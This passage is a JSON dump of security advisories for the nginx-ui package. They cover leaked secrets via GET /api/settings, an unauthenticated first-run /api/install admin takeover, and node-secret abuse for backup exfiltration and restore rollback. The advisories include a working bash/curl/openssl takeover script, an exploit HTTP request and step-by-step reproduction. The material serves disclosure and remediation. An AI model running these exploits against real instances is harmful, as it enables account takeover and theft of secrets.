2.3.8"}],"purl":"pkg:go/github.com%2F0xJacky%2Fnginx-ui"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS00cHZnLXBycjMtOWN4cs4ABWSi/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1xNHc3LTU2aHItODNybc4ABWSh","url":"https://github.com/advisories/GHSA-q4w7-56hr-83rm","title":"Nginx-UI Settings API Exposes Protected Secrets","description":"### Summary\nThe `GetSettings` API handler (`api/settings/settings.go:24-65`) serializes all settings structs to JSON and returns them to authenticated users. Many sensitive fields are tagged with `protected:\"true\"` - however, this tag is only enforced during writes (via `ProtectedFill` in `SaveSettings`) and is completely ignored during reads. This exposes 40+ protected fields including `JwtSecret` (enabling auth token forgery), `NodeSecret` (enabling cluster node impersonation), OIDC `ClientSecret` (enabling OAuth account takeover), and the IP whitelist configuration.\n\n### Details\n#### Vulnerable Code\n\n**`api/settings/settings.go:49-64` - GetSettings serializes all fields**\n\n```go\nc.JSON(http.StatusOK, gin.H{\n    \"app\":       cSettings.AppSettings,\n    \"server\":    cSettings.ServerSettings,\n    \"database\":  settings.DatabaseSettings,\n    \"auth\":      settings.AuthSettings,\n    \"casdoor\":   settings.CasdoorSettings,\n    \"oidc\":      settings.OIDCSettings,\n    \"cert\":      settings.CertSettings,\n    \"http\":      settings.HTTPSettings,\n    \"logrotate\": settings.LogrotateSettings,\n    \"nginx\":     settings.NginxSettings,\n    \"node\":      settings.NodeSettings,\n    \"openai\":    settings.OpenAISettings,\n    \"terminal\":  settings.TerminalSettings,\n    \"webauthn\":  settings.WebAuthnSettings,\n})\n```\n\nGo's `json.Marshal` serializes all exported fields with `json:` tags. The `protected:\"true\"` struct tag is a custom tag - it has no effect on JSON serialization.\n\n#### Protection is Write-Only\n\n**`api/settings/settings.go:126-135` - ProtectedFill only used during saves**\n\n```go\ncSettings.ProtectedFill(cSettings.AppSettings, \u0026json.App)\ncSettings.ProtectedFill(cSettings.ServerSettings, \u0026json.Server)\ncSettings.ProtectedFill(settings.AuthSettings, \u0026json.Auth)\n// ... etc\n```\n\n`ProtectedFill` prevents overwriting protected fields during `SaveSettings`, but `GetSettings` has no corresponding filter. The protection is asymmetric - secrets can be read but not overwritten.\n\n#### Exposed Protected Fields\n\n**`settings/node.go`:**\n- `Secret` (protected) - used for cluster node authentication\n- `SkipInstallation` (protected), `Demo` (protected)\n\n**`settings/oidc.go` (all protected):**\n- `ClientId`, `ClientSecret`, `Endpoint`, `RedirectUri`, `Scopes`, `Identifier`\n\n**`settings/casdoor.go` (all protected):**\n- `Endpoint`, `ExternalUrl`, `ClientId`, `ClientSecret`, `CertificatePath`, `Organization`, `Application`, `RedirectUri`\n\n**`settings/auth.go`:**\n- `IPWhiteList` (protected) - exposes security configuration\n\n#### Attack Scenario\n\n1. Low-privilege authenticated user calls `GET /api/settings`\n2. Response includes `NodeSecret` - attacker can impersonate cluster nodes\n3. Response includes OIDC `ClientSecret` - attacker can perform OAuth flows as the application\n4. Response includes `IPWhiteList` - attacker learns network security configuration\n5. If `JwtSecret` is in app settings (via cosy framework), attacker can forge authentication tokens for any user\n\n### PoC\n**1. `GetSettings` serializes all fields** without filtering `protected:\"true\"` tags. From `api/settings/settings.go:49-64`:\n\n```go\nc.JSON(http.StatusOK, gin.H{\n    \"app\":       cSettings.AppSettings,\n    \"server\":    cSettings.ServerSettings,\n    \"database\":  settings.DatabaseSettings,\n    \"auth\":      settings.AuthSettings,\n    \"casdoor\":   settings.CasdoorSettings,\n    \"oidc\":      settings.OIDCSettings,\n    \"cert\":      settings.CertSettings,\n    \"http\":      settings.HTTPSettings,\n    \"logrotate\": settings.LogrotateSettings,\n    \"nginx\":     settings.NginxSettings,\n    \"node\":      settings.NodeSettings,\n    \"openai\":    settings.OpenAISettings,\n    \"terminal\":  settings.TerminalSettings,\n    \"webauthn\":  settings.WebAuthnSettings,\n})\n```\n\nGo's `json.Marshal` serializes all exported fields. The custom `protected:\"true\"` tag has no effect on serialization.\n\n**2. Protected secrets are defined** across `settings/*.go`. High-impact examples:\n\n```go\n// settings/server_v1.go:19\nJwtSecret string `json:\"jwt_secret\" protected:\"true\"`\n\n// settings/node.go:5\nSecret string `json:\"secret\" protected:\"true\"`\n\n// settings/oidc.go\nClientSecret string `json:\"client_secret\" protected:\"true\"`\n\n// settings/auth.go\nIPWhiteList []string `json:\"ip_white_list\" protected:\"true\"`\n```\n\n**3. `ProtectedFill` is write-only.** It appears 10 times in `SaveSettings` (lines 126-135) but 0 times in `GetSettings`:\n\n```go\n// api/settings/settings.go:126-135 - Only used during writes\ncSettings.ProtectedFill(cSettings.AppSettings, \u0026json.App)\ncSettings.ProtectedFill(cSettings.ServerSettings, \u0026json.Server)\ncSettings.ProtectedFill(settings.AuthSettings, \u0026json.Auth)\n// ... 7 more calls\n```\n\n**4. Exploit request.** Any authenticated user can retrieve all secrets:\n\n```http\nGET /api/settings HTTP/1.1\nAuthorization: Bearer \u003cany-valid-jwt\u003e\n```\n\nResponse includes (among 45 protected fields):\n```json\n{\n  \"app\": {\"jwt_secret\": \"\u003cthe-actual-jwt-signing-key\u003e\", ...},\n  \"node\": {\"secret\": \"\u003cnode-authentication-secret\u003e\", ...},\n  \"oidc\": {\"client_secret\": \"\u003coidc-client-secret\u003e\", ...},\n  \"casdoor\": {\"client_secret\": \"\u003ccasdoor-client-secret\u003e\", ...},\n  \"auth\": {\"ip_white_list\": [\"10.0.0.1\", ...], ...},\n  \"nginx\": {\"reload_cmd\": \"nginx -s reload\", \"restart_cmd\": \"...\", ...}\n}\n```\n\n\n### Impact\n- **Authentication bypass via JwtSecret**: An attacker who obtains the `JwtSecret` can forge valid JWT tokens for any user, including admin accounts. This provides permanent, independent access that survives password changes and session revocations.\n- **Cluster compromise via NodeSecret**: The `NodeSecret` is used for inter-node authentication in nginx-ui clusters. An attacker can impersonate any cluster node, push malicious configurations to all nodes, and intercept cluster synchronization traffic.\n- **Third-party OAuth takeover**: Leaked OIDC `ClientSecret` and Casdoor `ClientSecret` allow the attacker to perform OAuth flows as the nginx-ui application, potentially gaining access to user accounts on the identity provider.\n- **Security configuration disclosure**: The `IPWhiteList`, `ReloadCmd`, `RestartCmd`, `ConfigDir`, `SbinPath`, and other protected fields reveal the security posture and infrastructure layout, enabling more targeted attacks.\n- **Low barrier to exploitation**: Any authenticated user (not just admins) can access `GET /api/settings`. In multi-user deployments, a low-privilege operator can escalate to full admin access.\n\n### Remediation\n\nFilter out `protected:\"true\"` fields before serialization.","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2026-05-06T17:01:04.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":6.5,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N","references":["https://github.com/0xJacky/nginx-ui/security/advisories/GHSA-q4w7-56hr-83rm","https://nvd.nist.gov/vuln/detail/CVE-2026-42223","https://github.com/0xJacky/nginx-ui/releases/tag/v2.3.8","https://github.com/advisories/GHSA-q4w7-56hr-83rm"],"source_kind":"github","identifiers":["GHSA-q4w7-56hr-83rm","CVE-2026-42223"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-05-06T18:00:09.102Z","updated_at":"2026-10-02T15:03:45.072Z","epss_percentage":0.00407,"epss_percentile":0.32537,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1xNHc3LTU2aHItODNybc4ABWSh","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1xNHc3LTU2aHItODNybc4ABWSh","packages":[{"ecosystem":"go","package_name":"github.com/0xJacky/nginx-ui","versions":[{"first_patched_version":"2.3.8","vulnerable_version_range":"\u003c= 2.3.7"}],"purl":"pkg:go/github.com%2F0xJacky%2Fnginx-ui"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1xNHc3LTU2aHItODNybc4ABWSh/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1teHFoLXE5aDYtdjhwcc4ABWSg","url":"https://github.com/advisories/GHSA-mxqh-q9h6-v8pq","title":"Nginx-UI: Unauthenticated first-boot instance claim via POST /api/install allows remote bootstrap takeover","description":"## Summary\n\nAn unauthenticated bootstrap takeover exists in `nginx-ui` during the initial installation window exposed by `POST /api/install`.\n\nWhen the instance is still uninitialized, `POST /api/install` is reachable without authentication and accepts attacker-controlled bootstrap data. The handler sets the application's JWT secret, the node secret, the certificate email, and the initial administrator username and password. This allows an attacker who can reach a fresh instance during the initial 10-minute setup window to claim the installation before the legitimate operator.\n\nThis is not a general post-install takeover. The exposure condition is narrower: the target must still be in its first-run state and still be within the initial setup window. In practice, this makes the issue most relevant during initial deployment, rebuilds, ephemeral test environments, LAN-accessible fresh installs, or temporarily exposed setup workflows.\n\nThe primary attack path is direct network access to a reachable fresh instance.[^cors]\n\nThis was reproduced over HTTP against live local instances started from `nginx-ui` `v2.3.5` using Docker image `uozi/nginx-ui@sha256:d73343e3009c9b558129a2be0cacd6c2c57ed8006a5871873b874b812e612e5a` (`org.opencontainers.image.version=2.3.5`, revision `1a9cd29a308278173aa0f16234cb78061dd2bd42`).\n\n## Impact\n\nThis issue allows full unauthenticated takeover of a fresh `nginx-ui` instance during the initial installation window.\n\nThe practical exposure window is limited, but the impact inside that window is complete administrative takeover. An attacker does not need to guess defaults or exploit an authenticated feature; they become the first administrator and define the instance trust material themselves.\n\nIn live testing, the attacker was able to:\n\n- confirm that the target was still uninitialized\n- submit attacker-chosen bootstrap credentials\n- lock the installation under attacker control\n- immediately authenticate as the newly set administrator\n\nObserved values during live reproduction included:\n\n```text\nINSTALL_BEFORE={\"lock\":false,\"timeout\":false}\nINSTALL_POST={\"message\":\"ok\"}\nINSTALL_AFTER={\"lock\":true,\"timeout\":false}\nLOGIN_RESPONSE={\"message\":\"ok\",\"code\":200,...,\"short_token\":\"qIJAE3dQMm3afhaV\"}\n```\n\nBecause the bootstrap request also initializes the application's trust material, this is more severe than a simple default-admin issue. An attacker does not merely guess credentials; they define the initial administrator account and application secrets themselves.\n\n## PoC\n\nThe following standalone PoC is sufficient to reproduce the issue without relying on any repository-local helper script. It requires only `bash`, `curl`, and `openssl`.\n\nStandalone PoC:\n\n```bash\n#!/usr/bin/env bash\nset -euo pipefail\n\nbase_url=\"http://127.0.0.1:9000\"\nemail=\"poc2@nginxui.test\"\nusername=\"pocverify2\"\npassword=\"Passw0rd123\"\n\ntmpdir=\"$(mktemp -d)\"\ntrap 'rm -rf \"$tmpdir\"' EXIT\n\ninstall_before=\"$(curl -fsS \"${base_url}/api/install\")\"\nprintf 'INSTALL_BEFORE=%s\\n' \"$install_before\"\n\nkey_json=\"$(curl -fsS \\\n  -H 'Content-Type: application/json' \\\n  --data \"{\\\"timestamp\\\":$(date +%s),\\\"fingerprint\\\":\\\"install-takeover-poc\\\"}\" \\\n  \"${base_url}/api/crypto/public_key\")\"\n\nkey_escaped=\"$(printf '%s' \"$key_json\" | sed -n 's/.*\"public_key\":\"\\(.*\\)\",\"request_id\".*/\\1/p')\"\nprintf '%b' \"$key_escaped\" \u003e \"${tmpdir}/public_key.pem\"\nopenssl rsa -RSAPublicKey_in -in \"${tmpdir}/public_key.pem\" -pubout -out \"${tmpdir}/public_key_spki.pem\" \u003e/dev/null 2\u003e\u00261\n\nprintf '{\"email\":\"%s\",\"username\":\"%s\",\"password\":\"%s\"}' \"$email\" \"$username\" \"$password\" \u003e \"${tmpdir}/install.json\"\nencrypted_install=\"$(\n  openssl pkeyutl -encrypt -pubin -inkey \"${tmpdir}/public_key_spki.pem\" -pkeyopt rsa_padding_mode:pkcs1 -in \"${tmpdir}/install.json\" \\\n  | openssl base64 -A\n)\"\n\ninstall_post=\"$(curl -fsS \\\n  -H 'Content-Type: application/json' \\\n  --data \"{\\\"encrypted_params\\\":\\\"${encrypted_install}\\\"}\" \\\n  \"${base_url}/api/install\")\"\nprintf 'INSTALL_POST=%s\\n' \"$install_post\"\n\ninstall_after=\"$(curl -fsS \"${base_url}/api/install\")\"\nprintf 'INSTALL_AFTER=%s\\n' \"$install_after\"\n\nprintf '{\"name\":\"%s\",\"password\":\"%s\",\"otp\":\"\",\"recovery_code\":\"\"}' \"$username\" \"$password\" \u003e \"${tmpdir}/login.json\"\nencrypted_login=\"$(\n  openssl pkeyutl -encrypt -pubin -inkey \"${tmpdir}/public_key_spki.pem\" -pkeyopt rsa_padding_mode:pkcs1 -in \"${tmpdir}/login.json\" \\\n  | openssl base64 -A\n)\"\n\nlogin_response=\"$(curl -fsS \\\n  -H 'Content-Type: application/json' \\\n  --data \"{\\\"encrypted_params\\\":\\\"${encrypted_login}\\\"}\" \\\n  \"${base_url}/api/login\")\"\nprintf 'LOGIN_RESPONSE=%s\\n' \"$login_response\"\n```\n\nObserved output during live verification:\n\n```text\nINSTALL_BEFORE={\"lock\":false,\"timeout\":false}\nINSTALL_POST={\"message\":\"ok\"}\nINSTALL_AFTER={\"lock\":true,\"timeout\":false}\nLOGIN_RESPONSE={\"message\":\"ok\",\"code\":200,\"token\":\"\u003credacted\u003e\",\"short_token\":\"qIJAE3dQMm3afhaV\"}\n```\n\n## Steps to Reproduce\n\n1. Start a fresh local `nginx-ui` `v2.3.5` instance from the tested Docker image digest with empty `/etc/nginx` and `/etc/nginx-ui` directories.\n\n```bash\nmkdir -p .tmp/poc-nginx .tmp/poc-nginx-ui\n\ndocker run -d --rm --name nginx-ui-poc \\\n  -v \"$PWD/.tmp/poc-nginx:/etc/nginx\" \\\n  -v \"$PWD/.tmp/poc-nginx-ui:/etc/nginx-ui\" \\\n  uozi/nginx-ui@sha256:d73343e3009c9b558129a2be0cacd6c2c57ed8006a5871873b874b812e612e5a\n```\n\n2. Save the standalone PoC above as a shell script and execute it against the internal HTTP listener, or run the equivalent commands directly inside the container with:\n\n```bash\ndocker exec -it nginx-ui-poc bash\n```\n\nThen set `base_url` to `http://127.0.0.1:9000` and run the standalone PoC.\n\n3. Observe the output.\n\nActual result:\n\n- `GET /api/install` returns `{\"lock\":false,\"timeout\":false}`\n- `POST /api/install` returns `{\"message\":\"ok\"}`\n- a follow-up `GET /api/install` returns `{\"lock\":true,\"timeout\":false}`\n- `POST /api/login` succeeds with the attacker-chosen username and password and returns a valid token\n\nExpected result:\n\n- arbitrary remote clients should never be able to complete bootstrap without a host-local or out-of-band secret\n- `POST /api/install` should be rejected unless the request carries a valid host-local or out-of-band bootstrap authorization factor\n- attacker-chosen bootstrap credentials and application secrets should never be accepted from arbitrary remote clients during first-run setup\n\n## Suggested Fix\n\n1. Remove remote unauthenticated installation as a security boundary. Do not rely on a 10-minute time window for protection.\n\n2. Require a local-only or out-of-band bootstrap secret for `POST /api/install`, for example:\n- generate a one-time setup token at startup\n- print or store it locally on the host\n- require that token to complete initialization\n\n3. Bind initial setup to loopback by default, or otherwise explicitly restrict first-run setup to trusted local access paths.\n\n4. Remove the pre-install unauthenticated exception from other sensitive setup-adjacent routes such as `/api/self_check` and `/api/restore`.\n\n5. As defense in depth, narrow CORS on setup endpoints. `POST /api/install` should not be callable cross-origin by arbitrary websites.\n\n6. Add regression tests covering:\n- unauthenticated remote `POST /api/install` being rejected by default\n- no installation claim without a valid bootstrap secret\n- `/api/self_check` and `/api/restore` requiring authentication\n- no cross-origin installation via browser preflight and JSON POST\n\n[^cors]: In live testing, `OPTIONS /api/install` returned `Access-Control-Allow-Origin: *`. That may enable browser-assisted exploitation in some deployment layouts, but it is not required for exploitation and is not the primary path.","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2026-05-06T16:59:43.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":8.1,"cvss_vector":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H","references":["https://github.com/0xJacky/nginx-ui/security/advisories/GHSA-mxqh-q9h6-v8pq","https://nvd.nist.gov/vuln/detail/CVE-2026-42222","https://github.com/advisories/GHSA-mxqh-q9h6-v8pq"],"source_kind":"github","identifiers":["GHSA-mxqh-q9h6-v8pq","CVE-2026-42222"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-05-06T17:00:08.988Z","updated_at":"2026-09-28T20:03:39.208Z","epss_percentage":0.00474,"epss_percentile":0.38502,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1teHFoLXE5aDYtdjhwcc4ABWSg","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1teHFoLXE5aDYtdjhwcc4ABWSg","packages":[{"ecosystem":"go","package_name":"github.com/0xJacky/nginx-ui","versions":[{"first_patched_version":null,"vulnerable_version_range":"= 2.3.5"}],"purl":"pkg:go/github.com%2F0xJacky%2Fnginx-ui"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1teHFoLXE5aDYtdjhwcc4ABWSg/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1oMjd2LXBoN3ctbTlmcM4ABWSf","url":"https://github.com/advisories/GHSA-h27v-ph7w-m9fp","title":"Nginx-UI: Unauthenticated First-Run Installer Allows Remote Initial Admin Claim","description":"### Summary\nAn unauthenticated network attacker can claim the initial administrator account on a fresh `nginx-ui` instance during the first-run setup window. The public `/api/install` endpoint is reachable without authentication, and the request-encryption flow only protects payload confidentiality in transit; it does not authenticate who is allowed to perform installation. A remote attacker who reaches the service before the legitimate operator can set the admin email, username, and password, causing permanent initial-instance takeover.\n\n### Details\nThe vulnerable route is exposed publicly through the main API router. `router/routers.go:61-70` mounts `system.InitPublicRouter(root)` under `/api`, and `api/system/router.go:16-19` registers both `GET /api/install` and `POST /api/install` without `AuthRequired()`.\n\nThe install handler only checks whether the instance is already installed and whether more than ten minutes have elapsed since startup. `api/system/install.go:26-33` treats the instance as uninstalled when `JwtSecret` is empty and `SkipInstallation` is false. `api/system/install.go:56-69` rejects requests only if installation has already happened or the ten-minute window has expired.\n\nIf those checks pass, the unauthenticated caller controls the initialization flow. `api/system/install.go:77-81` generates and saves the JWT secret, node secret, and certificate email from attacker-controlled input, and `api/system/install.go:93-97` overwrites user ID `1` with the attacker-chosen username and password hash. `internal/kernel/init_user.go:15-22` guarantees that privileged user ID `1` exists ahead of time, so there is always an account to claim.\n\nThe public-key bootstrap does not add authentication. `api/crypto/router.go:5-9` exposes `POST /api/crypto/public_key` publicly, `api/crypto/crypto.go:12-32` returns a server public key to any caller, `internal/crypto/crypto.go:44-61` stores a shared keypair in cache, and `internal/middleware/encrypted_params.go:25-50` only decrypts `encrypted_params` before passing the request to the install handler. No request ID, local-only restriction, bootstrap secret, or prior trust check is enforced.\n\nThis was verified locally in an isolated lab instance. A fresh instance returned `{\"lock\":false,\"timeout\":false}`, an unauthenticated `POST /api/install` returned `{\"message\":\"ok\"}`, the instance then flipped to `{\"lock\":true,\"timeout\":false}`, and the on-disk SQLite database showed user ID `1` renamed to the attacker-controlled username with a non-empty password hash.\n\n### PoC\nThe quickest local verification path is the helper script created during validation:\n\n```bash\nATTACKER_EMAIL='attacker@example.com' ATTACKER_USER='attacker' ATTACKER_PASS='Password12345' \\\n'/Users/r1zzg0d/Documents/CVE hunting/targets/nginx-ui/output/verify/verify_fresh_install_takeover.sh'\n```\n\nExpected proof points:\n\n```text\n[1/6] Fresh-instance status:\n{\n  \"lock\": false,\n  \"timeout\": false\n}\n\n[3/6] Claiming the initial administrator account...\n{\n  \"message\": \"ok\"\n}\n\n[4/6] Verifying install is now locked...\n{\n  \"lock\": true,\n  \"timeout\": false\n}\n\n[5/6] Verifying the on-disk admin record was overwritten...\n{\n  \"id\": 1,\n  \"name\": \"attacker\",\n  \"password_len\": 60\n}\n```\n\nTo confirm the final state manually:\n\n```bash\nsqlite3 '/Users/r1zzg0d/Documents/CVE hunting/targets/nginx-ui/tmp/poc-install-takeover/database.db' \\\n'select id,name,length(password) from users where id=1;'\n```\n\nExpected output:\n\n```text\n1|attacker|60\n```\n\nManual HTTP reproduction is also straightforward:\n\n1. Request `GET /api/install` and confirm `lock=false` and `timeout=false`.\n2. Request `POST /api/crypto/public_key` to obtain the public RSA key.\n3. Encrypt `{\"email\":\"attacker@example.com\",\"username\":\"attacker\",\"password\":\"Password12345\"}` with that public key and base64-encode the ciphertext.\n4. Submit the ciphertext to `POST /api/install` as `{\"encrypted_params\":\"...\"}`.\n5. Re-request `GET /api/install` and observe that `lock=true`.\n6. Inspect the backing database and confirm user ID `1` now belongs to the attacker-controlled username.\n\n### Impact\nThis is an authentication bypass / initial admin claim vulnerability affecting fresh, uninitialized instances that are reachable over the network during the installation window. Any attacker able to reach the service before the legitimate operator can permanently take ownership of the first administrator account and thereby seize control of the application. Because `nginx-ui` is an administrative interface for Nginx and related host-management features, compromise of the initial admin account can lead to unauthorized configuration changes, certificate management abuse, backup manipulation, service disruption, and broader operational takeover of the managed environment.\n\n### Remediation\n1. Require a single-use bootstrap secret for installation. Generate the token locally on first start, print it only to the server console or write it to a root-owned local file, and require it on `POST /api/install`.\n2. Restrict installation endpoints to loopback by default until setup completes. Remote setup should require an explicit opt-in configuration flag, not be enabled automatically on all interfaces.\n3. Make installer claim atomic and explicitly stateful. Persist a dedicated installation state record, consume the bootstrap token exactly once, and refuse concurrent or repeated initialization attempts even within the startup window.","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2026-05-06T16:59:00.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":8.1,"cvss_vector":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H","references":["https://github.com/0xJacky/nginx-ui/security/advisories/GHSA-h27v-ph7w-m9fp","https://nvd.nist.gov/vuln/detail/CVE-2026-42221","https://github.com/0xJacky/nginx-ui/releases/tag/v2.3.8","https://github.com/advisories/GHSA-h27v-ph7w-m9fp"],"source_kind":"github","identifiers":["GHSA-h27v-ph7w-m9fp","CVE-2026-42221"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-05-06T17:00:08.988Z","updated_at":"2026-09-25T12:04:01.467Z","epss_percentage":0.01603,"epss_percentile":0.74774,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1oMjd2LXBoN3ctbTlmcM4ABWSf","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1oMjd2LXBoN3ctbTlmcM4ABWSf","packages":[{"ecosystem":"go","package_name":"github.com/0xJacky/Nginx-UI","versions":[{"first_patched_version":"2.3.8","vulnerable_version_range":"\u003e= 2.0.0, \u003c= 2.3.5"}],"purl":"pkg:go/github.com%2F0xJacky%2FNginx-UI"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1oMjd2LXBoN3ctbTlmcM4ABWSf/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS03anJyLXh3OWMtbWozOc4ABWNA","url":"https://github.com/advisories/GHSA-7jrr-xw9c-mj39","title":"Nginx-UI: Authenticated settings disclosure exposes node.secret and enables trusted-node authentication abuse, backup exfiltration, and restore-based nginx-ui state rollback","description":"## Summary\nAn authenticated user can call `GET /api/settings` and retrieve sensitive configuration values, including `node.secret`. The same `node.secret` is accepted by `AuthRequired()` through the `X-Node-Secret` header (or `node_secret` query parameter), causing the request to be treated as authenticated via the trusted-node path and associated with the init user.\nIn my local reproduction on `v2.3.6`, `GET /api/settings` also returned `app.jwt_secret`. After extracting `node.secret`, I was able to access `GET /api/backup` using only `X-Node-Secret`, download a full backup archive, and obtain the `X-Backup-Security` response header containing the backup decryption material (`AESKey:AESIv`).\nI also confirmed that the disclosed `node.secret` is sufficient to reach the restore workflow on an installed instance. Using only `X-Node-Secret`, a valid backup archive, and its matching `X-Backup-Security` token, I successfully invoked `POST /api/restore`. In a follow-up rollback test, I changed `node.name` to `rollback-poc-B`, then restored a previously captured backup and observed the value revert to its original state. This extends the issue beyond secret disclosure and backup exfiltration into confirmed integrity impact through restore-based rollback of nginx-ui state/configuration.\nThis breaks the trust boundary between ordinary user-authenticated API access and the internal node-authentication mechanism, and results in sensitive configuration disclosure, alternate-authentication abuse, backup exfiltration with decryption material, and confirmed restore-based rollback of nginx-ui state.\n\n## Details\n### Vulnerable code / related files and functions\n\n**1) Route exposure and insufficient protection on the read path**\n\nFile: `api/settings/router.go`\n\nRelevant function: `InitRouter`\n\nThe settings router exposes the following endpoints:\n```http\nGET /api/settings/server/name → GetServerName\nGET /api/settings → GetSettings\nPOST /api/settings → RequireSecureSession(), SaveSettings\n```\n\nThe key issue is that the read path (GET /api/settings) is only protected by the generic authentication middleware, while the write path (POST /api/settings) has an additional RequireSecureSession() check. This makes the read path a much easier place to leak sensitive configuration data than the write path.\n```go\nr.GET(\"settings/server/name\", GetServerName)\nr.GET(\"settings\", GetSettings)\nr.POST(\"settings\", middleware.RequireSecureSession(), SaveSettings)\n```\n\n**2) Sensitive data is disclosed by GetSettings**\n\nFile: `api/settings/settings.go`\n\nRelevant functions: GetSettings, SaveSettings\n\n`GetSettings` returns multiple configuration objects directly in the JSON response, including app, server, database, auth, casdoor, oidc, cert, http, logrotate, nginx, node, openai, terminal, and webauthn. In other words, the handler does not use a redacted DTO for user-facing output; it serializes the live settings objects directly.\n\n```go\nc.JSON(http.StatusOK, gin.H{\n  \"app\":       cSettings.AppSettings,\n  \"server\":    cSettings.ServerSettings,\n  \"database\":  settings.DatabaseSettings,\n  \"auth\":      settings.AuthSettings,\n  \"casdoor\":   settings.CasdoorSettings,\n  \"oidc\":      settings.OIDCSettings,\n  \"cert\":      settings.CertSettings,\n  \"http\":      settings.HTTPSettings,\n  \"logrotate\": settings.LogrotateSettings,\n  \"nginx\":     settings.NginxSettings,\n  \"node\":      settings.NodeSettings,\n  \"openai\":    settings.OpenAISettings,\n  \"terminal\":  settings.TerminalSettings,\n  \"webauthn\":  settings.WebAuthnSettings,\n})\n```\n\nIn my local reproduction on v2.3.6, this response exposed both:\n```\nnode.secret\napp.jwt_secret\n```\n\nThis makes GetSettings the direct disclosure source for the vulnerability.\n\n**3) The disclosed value is explicitly defined as protected/sensitive**\n\nFile: `settings/node.go`\n\nRelevant object: type Node\n\nThe Node settings object defines the following field:\n```go\ntype Node struct {\n    Name   string `json:\"name\" binding:\"omitempty,safety_text\"`\n    Secret string `json:\"secret\" protected:\"true\"`\n    ...\n}\n```\n\nThe `protected:\"true\"` tag shows that the codebase itself treats `node.secret` as a protected/sensitive value. Despite that, the field is still returned unredacted by `GetSettings`. This strongly indicates a real secret disclosure issue rather than a harmless configuration read.\n\n**4) The disclosed secret is reused as an authentication credential**\n\nFile: `internal/middleware/middleware.go`\n\nRelevant functions: getNodeSecret, AuthRequired, AuthRequiredWS\n\nThe authentication middleware contains a separate node-secret authentication path:\n\n- `getNodeSecret(c)` reads the value from the `X-Node-Secret` header or the `node_secret` query parameter.\n- AuthRequired() checks whether the supplied value equals settings.NodeSettings.Secret.\n- If it matches, the middleware:\n        loads initUser := user.GetInitUser(c)\n        stores Secret in the context\n        stores user in the context\n- allows the request to proceed without relying on the ordinary JWT path for that identity flow\n\nThis is the sink of the vulnerability: the same secret disclosed by GET /api/settings is accepted as a valid authentication credential by the middleware.\n\n```go\nif nodeSecret := getNodeSecret(c); nodeSecret != \"\" \u0026\u0026 nodeSecret == settings.NodeSettings.Secret {\n    initUser := user.GetInitUser(c)\n    c.Set(\"Secret\", nodeSecret)\n    c.Set(\"user\", initUser)\n    c.Next()\n    return\n}\n```\n\nAuthRequiredWS() contains similar logic for the WebSocket path, meaning the same secret is also trusted by the WebSocket authentication flow.\n\n**5) The write path already treats these fields as protected, but the read path does not**\n\nFile: `api/settings/settings.go`\n\nRelevant function: SaveSettings\n\n`SaveSettings()` already uses ProtectedFill(...) for several settings objects, including:\n```\nAppSettings\nNodeSettings\nOpenAISettings\nNginxSettings\nOIDCSettings\n```\n\nThis shows the project already recognizes that these objects contain protected fields on the write path. However, GetSettings() still returns the raw objects on the read path, creating a clear “write-protected but read-exposed” inconsistency. That inconsistency is the core authorization/secret-handling flaw here.\n```go\ncSettings.ProtectedFill(cSettings.AppSettings, \u0026json.App)\ncSettings.ProtectedFill(settings.NodeSettings, \u0026json.Node)\ncSettings.ProtectedFill(settings.OpenAISettings, \u0026json.Openai)\ncSettings.ProtectedFill(settings.NginxSettings, \u0026json.Nginx)\ncSettings.ProtectedFill(settings.OIDCSettings, \u0026json.Oidc)\n```\n\n**6) Backup endpoint reachable after alternate authentication**\n\nFile: `api/backup/router.go`, `api/backup/backup.go`\n\nRelevant functions: `InitRouter`, `CreateBackup`\n\nThe backup route is exposed as:\n\n```go\nr.GET(\"backup\", CreateBackup)\n```\n\nThis route is protected by the same AuthRequired() middleware chain as other authenticated API routes.\n\nIn `CreateBackup()`, the server returns the backup archive to the caller and also sets the X-Backup-Security response header containing the decryption material:\n```go\nc.Header(\"X-Backup-Security\", fmt.Sprintf(\"%s:%s\", backup.Security.AESKey, backup.Security.AESIv))\nc.File(backupFilePath)\n```\n\nAs a result, once node.secret is disclosed from /api/settings and reused through X-Node-Secret, the attacker can access /api/backup and obtain both the encrypted backup and the decryption token in the same response.\n\nThis means the disclosed secret is not only usable for low-risk authenticated reads, but also for high-impact data exfiltration through the backup subsystem.\n\n**7) Restore endpoint is reachable and usable after alternate authentication**\n\nFile: `api/backup/router.go`, `api/backup/restore.go`, `internal/backup/restore.go`\n\nRelevant functions: `authIfInstalled`, `RestoreBackup`, internal restore helpers\n\nThe restore route is exposed as:\n\n```go\nr.POST(\"/restore\", authIfInstalled, middleware.EncryptedForm(), RestoreBackup)\n```\n\nOn installed instances, authIfInstalled calls AuthRequired(). Because AuthRequired() accepts X-Node-Secret and 